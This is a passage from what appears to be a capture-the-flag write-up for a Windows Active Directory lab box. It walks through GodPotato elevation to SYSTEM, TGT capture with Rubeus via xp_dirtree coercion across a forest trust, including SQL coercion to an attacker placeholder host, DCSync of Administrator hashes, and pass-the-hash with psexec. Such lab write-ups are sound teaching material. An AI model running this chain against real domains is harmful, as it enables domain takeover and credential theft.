[*] Connecting to DCE/RPC as darkzero.ext\svc_sql
[*] Password was changed successfully.
```
Now let’s check whether a service logon brings the privileges back.
```
PS C:\w1ld> .\RunasCs.exe svc_sql Password123! -l 5 -b "whoami /priv"
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
```
The service logon gives us SeImpersonatePrivilege. Use your reverse shell of choice; note that PowerShell breaks when you use PowerShell reverse shells from here, so you might want to run powershell.exe directly and then pipe in the commands.
Now that we have SeImpersonatePrivilege, let’s transfer over GodPotato and use it to go from svc_sql to SYSTEM.
```
C:\w1ld>GodPotato-NET4.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140710263848960
[*] DispatchTable: 0x140710266435912
[*] UseProtseqFunction: 0x140710265731248
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\9f2853ec-b87e-4d08-98c1-2bee824c5e98\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00009002-0280-ffff-5fba-6508753f7848
[*] DCOM obj OXID: 0xeff84b6fe3fb4ed8
[*] DCOM obj OID: 0x84822c2935658eaf
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 996 Token:0x736 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3800
nt authority\system
```
Grab a reverse shell and check out the Administrator/Desktop folder for the user flag.
```
PS C:\users\Administrator\Desktop> ls -force
Directory: C:\users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 7/29/2025 5:58 AM 282 desktop.ini
-a---- 10/6/2025 2:57 AM 34 user.txt
```
Just like that, we have User!
Let’s take a look at the trust relationship between these two domains.
```
bloodyAD -d $D --host dc01.darkzero.htb -u $USER -p $PASS get trusts
darkzero.htb
+-- <FOREST_TRANSITIVE|CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION|AD>:darkzero.ext
```
It is a forest trust with the CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION attribute set. That attribute means TGT delegation across the trust is enabled, i.e. the default hardening that stops unconstrained delegation from working across forest trusts (EnableTGTDelegation = No) has been switched off. So if a host in darkzero.ext that is trusted for unconstrained delegation can get a principal from darkzero.htb to authenticate to it, that principal’s forwardable TGT is sent along with the service ticket.
We now have SYSTEM on DC02, and DC02 is a domain controller, which is trusted for unconstrained delegation by default. Running Rubeus.exe in monitor mode (it needs an elevated context to read tickets out of LSA) lets us capture any TGT that gets delegated to the machine.
```
PS C:\w1ld> .\Rubeus.exe monitor /interval:5 /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.2
[*] Action: TGT Monitoring
[*] Monitoring every 5 seconds for new TGTs
<SNIP>
```
Next let’s use impacket-mssqlclient.py to enter into an mssql session on DC01.darkzero.htb.
```
$ mssqlclient.py $D/$USER:$PASS@dc01.darkzero.htb -windows-auth
/home/kali/.local/share/uv/tools/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (darkzero\john.w guest@master)>
```
Note that here I’m using -windows-auth to use domain authentication rather than SQL logins. The prompt shows we are only mapped to guest in master, which is enough for what follows.
Lastly let’s do an xp_dirtree to coerce DC01.darkzero.htb to authenticate to DC02.darkzero.ext
```
SQL (darkzero\john.w guest@master)> xp_dirtree \\DC02.darkzero.ext\w1ld\pwned
subdirectory depth file
------------ ----- ----
```
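Which ticket lands on DC02 depends on which instance runs the procedure and which Windows account that instance runs as, and whether a guest login can even call the procedure. As an added example that is not part of the original post, these queries check both before firing the coercion, and show the fallbacks if xp_dirtree has been locked down. The UNC path \\DC02.darkzero.ext\w1ld\pwned is the arbitrary one used above; it only has to name a host we control, the share need not exist. [ATTACKER] in the last statement is a placeholder for a listener of ours, not a host on the box.

```sql
-- Added example, not from the original post. Run from the guest@master session on DC01.
USE master;

-- Which Windows account will do the outbound SMB authentication? A virtual account
-- (NT Service\MSSQLSERVER) or NETWORK SERVICE authenticates on the network as the
-- computer account, which is why the ticket that turns up on DC02 belongs to DC01$.
-- Needs VIEW SERVER STATE; if that is denied, the captured ticket answers the question anyway.
SELECT servicename, service_account, status_desc
FROM   sys.dm_server_services;

-- The coercion procedures are granted to public by default, so a guest mapping in
-- master is enough; no sysadmin and no xp_cmdshell required. Confirm before relying on it.
SELECT OBJECT_NAME(major_id)            AS proc_name,
       USER_NAME(grantee_principal_id)  AS grantee,
       state_desc
FROM   sys.database_permissions
WHERE  class = 1
  AND  major_id IN (OBJECT_ID('master..xp_dirtree'),
                    OBJECT_ID('master..xp_fileexist'),
                    OBJECT_ID('master..xp_subdirs'));

-- Force an SMB session from DC01 to DC02. Authentication happens before the server
-- can reply that the path is missing, so a non-existent share is fine. Depth 1, include files.
EXEC master..xp_dirtree '\\DC02.darkzero.ext\w1ld\pwned', 1, 1;

-- Fallbacks if xp_dirtree has been revoked from public.
EXEC master..xp_fileexist '\\DC02.darkzero.ext\w1ld\pwned.txt';
EXEC master..xp_subdirs   '\\DC02.darkzero.ext\w1ld';

-- Through the link the direction flips: DC02's service account does the authenticating,
-- towards whatever host is named. Useful when DC02 rather than DC01 is the account you want.
EXEC ('EXEC master..xp_dirtree ''\\ATTACKER\share'', 1, 1') AT [DC02.darkzero.ext];
```

The first query is the one to run before choosing a target: if the service runs as a plain domain user instead of a machine-context account, the ticket you catch is that user’s and the DC01$ route described below does not exist.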
Going back to our Rubeus session we can see that we’ve captured another TGT, and it belongs to DC01$: the SQL Server service on DC01 authenticated to DC02 as the computer account, and because DC02 is trusted for unconstrained delegation and the trust permits TGT delegation, a forwardable copy of DC01$’s TGT was sent along with the service ticket and cached in DC02’s LSA (note the forwarded and forwardable flags).
```
[*] 10/6/2025 11:33:58 PM UTC - Found new TGT:
User : DC01$@DARKZERO.HTB
StartTime : 10/6/2025 4:33:56 PM
EndTime : 10/7/2025 2:33:55 AM
RenewTill : 10/13/2025 4:33:55 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
doIFjDCCBYigAwIBBaEDAg<SNIP>
```
Let’s transfer this base64-encoded ticket to our attacker machine.
```
echo -n 'doIFjDCCBYigA[REDACTED]' > dc01.b64
```
Next let’s decode it into a kirbi file.
```
base64 -d dc01.b64 > dc01.kirbi
```
Lastly let’s use impacket-ticketconverter.py to convert this kirbi file to a ccache we can use to authenticate
```
$ ticketConverter.py dc01.kirbi dc01.ccache
/home/kali/.local/share/uv/tools/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
```
Let’s now point KRB5CCNAME at this ccache and attempt to authenticate to the domain with it.
```
$ export KRB5CCNAME=/home/kali/htb/DarkZero/dc01.ccache
$ bloodyAD -d darkzero.htb --host dc01.darkzero.htb -k get writable
distinguishedName: CN=Keys,DC=darkzero,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
distinguishedName: CN=Administrator,CN=Users,DC=darkzero,DC=htb
permission: WRITE
```
Success! We are now authenticating as DC01$, a domain controller’s own account. A DC account holds the directory replication rights that secretsdump’s DRSUAPI (DCSync) method needs, so let’s dump the Administrator hash.
```
$ secretsdump.py 'darkzero.htb/DC01$@dc01.DARKZERO.htb' -k -no-pass -just-dc-user Administrator
/home/kali/.local/share/uv/tools/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[REDACTED]:::
[*] Kerberos keys grabbed
Administrator:0x14:[REDACTED]
Administrator:0x13:[REDACTED]
Administrator:aes256-cts-hmac-sha1-96:[REDACTED]
Administrator:aes128-cts-hmac-sha1-96:[REDACTED]
Administrator:0x17:[REDACTED]
[*] Cleaning up...
```
Now that we have the Administrator NT hash, pass-the-hash with psexec.py gets us a SYSTEM shell on DC01 ($DC is dc01.darkzero.htb and $HASH the NT hash from the dump).
```
$ psexec.py "$D/Administrator@$DC" -hashes ":$HASH"
/home/kali/.local/share/uv/tools/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc01.darkzero.htb.....
[*] Found writable share ADMIN$
[*] Uploading file WgBleoMq.exe
[*] Opening SVCManager on dc01.darkzero.htb.....
[*] Creating service cyOA on dc01.darkzero.htb.....
[*] Starting service cyOA.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.26100.4652]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\System32> cd "C:\Users\Administrator\Desktop"
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is EF7E-D912
Directory of C:\Users\Administrator\Desktop
07/31/2025 03:21 PM <DIR> .
03/23/2025 08:38 PM <DIR> ..
10/06/2025 03:31 PM 34 root.txt
10/06/2025 03:31 PM 34 user.txt
2 File(s) 68 bytes
2 Dir(s) 6,333,386,752 bytes free
```
Just like that, we have Root!
tags: boxes - diff/hard - os/windows